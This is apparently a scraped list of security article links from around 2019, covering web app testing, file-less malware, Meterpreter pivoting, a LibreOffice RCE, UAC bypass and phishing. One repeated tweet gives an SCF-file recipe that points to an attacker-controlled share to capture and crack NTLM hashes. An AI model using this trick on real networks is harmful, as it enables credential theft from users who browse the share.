Setting up Burp Suite and OWASP WebGoat in Linux for learning Web Application Security
https://medium.com/@Miraj50/setting-up-burp-suite-and-owasp-webgoat-in-linux-for-learning-web-application-security-f8a25b5fdba3
https://medium.com/@Miraj50/setting-up-burp-suite-and-owasp-webgoat-in-linux-for-learning-web-application-security-f8a25b5fdba3
Medium
Setting up Burp Suite and OWASP WebGoat in Linux for learning Web Application Security
Setting up Burp Suite :
Cyber Defense | Writing Tips for IT Professionals | SANS Institute
https://cyber-defense.sans.org/blog/2019/01/25/writing-tips-for-it-professionals
https://cyber-defense.sans.org/blog/2019/01/25/writing-tips-for-it-professionals
cyber-defense.sans.org
Cyber Defense | Writing Tips for IT Professionals | SANS Institute
Cyber Defense blog pertaining to Writing Tips for IT Professionals
Web Application Penetration Testing Checklist (Updated 2019)
https://cybersguards.com/web-application-penetration-testing-checklist-updated-2019/
https://cybersguards.com/web-application-penetration-testing-checklist-updated-2019/
Cybers Guards
Web Application Penetration Testing Checklist (* New* Updated 2019) - Cybers Guards
Penetration testing is the process of testing software for its security vulnerabilities by trained security experts (e.g. penetration tests or ethical
Anti-forensic and File-less Malware - Malware - 0x00sec - The Home of the Hacker
http://0x00sec.org/t/anti-forensic-and-file-less-malware/10008
http://0x00sec.org/t/anti-forensic-and-file-less-malware/10008
0x00sec - The Home of the Hacker
Anti-forensic and File-less Malware
Anti-forensic and File-less Malware Recommended Pre-requisites C programming language PowerShell scripting language Intel x86 assembly language Windows API Windows Internals PE file format Contents Introduction Fundamental Concepts 2.1 File-less Techniques…
GitHub - 0xgalz/Virtuailor: IDAPython tool for creating automatic C++ virtual tables in IDA Pro
https://github.com/0xgalz/Virtuailor
https://github.com/0xgalz/Virtuailor
GitHub
GitHub - 0xgalz/Virtuailor: IDAPython tool for creating automatic C++ virtual tables in IDA Pro
IDAPython tool for creating automatic C++ virtual tables in IDA Pro - 0xgalz/Virtuailor
SMB Named Pipe Pivoting in Meterpreter – Péter Gombos – Medium
https://medium.com/@petergombos/smb-named-pipe-pivoting-in-meterpreter-462580fd41c5
https://medium.com/@petergombos/smb-named-pipe-pivoting-in-meterpreter-462580fd41c5
Medium
SMB Named Pipe Pivoting in Meterpreter
A hidden feature of Metasploit, is the ability to add SMB Named Pipe listeners in a meterpreter session to pivot on an internal network…
InsertScript: Libreoffice (CVE-2018-16858) - Remote Code Execution via Macro/Event execution
https://insert-script.blogspot.com/2019/02/libreoffice-cve-2018-16858-remote-code.html
https://insert-script.blogspot.com/2019/02/libreoffice-cve-2018-16858-remote-code.html
Blogspot
Libreoffice (CVE-2018-16858) - Remote Code Execution via Macro/Event execution
I started to have a look at Libreoffice and discovered a way to achieve remote code execution as soon as a user opens a malicious ODT file...
Active Directory Penetration:-
Part 1:-
https://t.co/cdcxik3eKA
Part2:-
https://t.co/EyjlEp6wzO
Part3:-
https://t.co/DUPpzKZego
Part 4:-
https://t.co/d31FO8yMku https://t.co/f6rMw6k7xd
Part 1:-
https://t.co/cdcxik3eKA
Part2:-
https://t.co/EyjlEp6wzO
Part3:-
https://t.co/DUPpzKZego
Part 4:-
https://t.co/d31FO8yMku https://t.co/f6rMw6k7xd
UAC Bypass via SystemPropertiesAdvanced.exe and DLL Hijacking – egre55 – thoughts on security
https://egre55.github.io/system-properties-uac-bypass/
https://egre55.github.io/system-properties-uac-bypass/
egre55.github.io
SystemPropertiesAdvanced.exe DLL Hijacking UAC Bypass
ActiveX Exploitation in 2019 :: Instantiation is not Scripting
https://srcincite.io/blog/2019/02/01/activex-exploitation-in-2018-instantiation-is-not-scripting.html
https://srcincite.io/blog/2019/02/01/activex-exploitation-in-2018-instantiation-is-not-scripting.html
Round of use Winrm code execution XML – Matt harr0ey – Medium
https://medium.com/@mattharr0ey/round-of-use-winrm-code-execution-xml-6e3219d3e31
https://medium.com/@mattharr0ey/round-of-use-winrm-code-execution-xml-6e3219d3e31
Medium
Round of use Winrm code execution XML
Introduction This beginning alludes to give point simple concept related to using Winrm.vbs to do code executed by XML file so I could…
Obfuscation Techniques used in Phishing Attacks - redteamsec
https://www.reddit.com/r/redteamsec/comments/ampngj/obfuscation_techniques_used_in_phishing_attacks/
https://www.reddit.com/r/redteamsec/comments/ampngj/obfuscation_techniques_used_in_phishing_attacks/
reddit
r/redteamsec - Obfuscation Techniques used in Phishing Attacks
9 votes and 0 comments so far on Reddit
Tribe of Hackers: Free PDF Version - Threatcare
https://www.threatcare.com/tribe-of-hackers-free-pdf/
https://www.threatcare.com/tribe-of-hackers-free-pdf/
Threatcare
Tribe of Hackers Free PDF - Threatcare
Get the Tribe of Hackers Free PDF from this page by signing up with your email adress. Tribe of Hackers contains insights from 70 industry professionals.
Need creds on a local network? Found an open network share?
1) Create an scf file with the following:
[Shell] Command=2 IconFile=\\X.X.X.X\share\test.ico
[Taskbar] Command=ToggleDesktop
2) Upload to the share.
3) Run your capture tool or relay creds.
4) Wait, crack hash, enjoy
1) Create an scf file with the following:
[Shell] Command=2 IconFile=\\X.X.X.X\share\test.ico
[Taskbar] Command=ToggleDesktop
2) Upload to the share.
3) Run your capture tool or relay creds.
4) Wait, crack hash, enjoy
Automation In Red Teaming – Red Teaming with a Blue Team Mentaility – Medium
https://medium.com/red-teaming-with-a-blue-team-mentaility/automation-in-red-teaming-32363e3a50d
https://medium.com/red-teaming-with-a-blue-team-mentaility/automation-in-red-teaming-32363e3a50d
Medium
Automation In Red Teaming
The offensive security community is advancing rapidly. With platforms such as Twitter along with several widely used blogging sites…
Mass Cracking Cybrary Accounts – Somdev Sangwan
https://s0md3v.github.io/mass-cracking-cybrary-accounts/
https://s0md3v.github.io/mass-cracking-cybrary-accounts/
Reverse RDP Attack: Code Execution on RDP Clients - Check Point Research
https://research.checkpoint.com/reverse-rdp-attack-code-execution-on-rdp-clients/
https://research.checkpoint.com/reverse-rdp-attack-code-execution-on-rdp-clients/
Check Point Research
Reverse RDP Attack: Code Execution on RDP Clients - Check Point Research
Research by: Eyal Itkin Overview Used by thousands of IT professionals and security researchers worldwide, the Remote Desktop Protocol (RDP) is usually considered a safe and trustworthy application to connect to remote computers. Whether it is used to help…
Phishing Campaigns are Manipulating the Windows Control Panel Extension to Deliver Banking Trojans - Cofense
https://cofense.com/phishing-campaigns-manipulating-windows-control-panel-extension-deliver-banking-trojans/
https://cofense.com/phishing-campaigns-manipulating-windows-control-panel-extension-deliver-banking-trojans/
Cofense
Phishing Campaigns are Manipulating the Windows Control Panel Extension to Deliver Banking Trojans - Cofense
By Aaron Riley and Marcel Feller CISO Summary Recently, CofenseTM has seen phishing campaigns that bypass email security using a .cpl file extension attachment. .CPL is the file name extension for items or icons appearing in the Windows Control Panel. These…
Notes on fuzzing ImageMagick and GraphicsMagick - The Blagoblag
https://alexgaynor.net/2019/feb/05/notes-fuzzing-imagemagick-graphicsmagick/
https://alexgaynor.net/2019/feb/05/notes-fuzzing-imagemagick-graphicsmagick/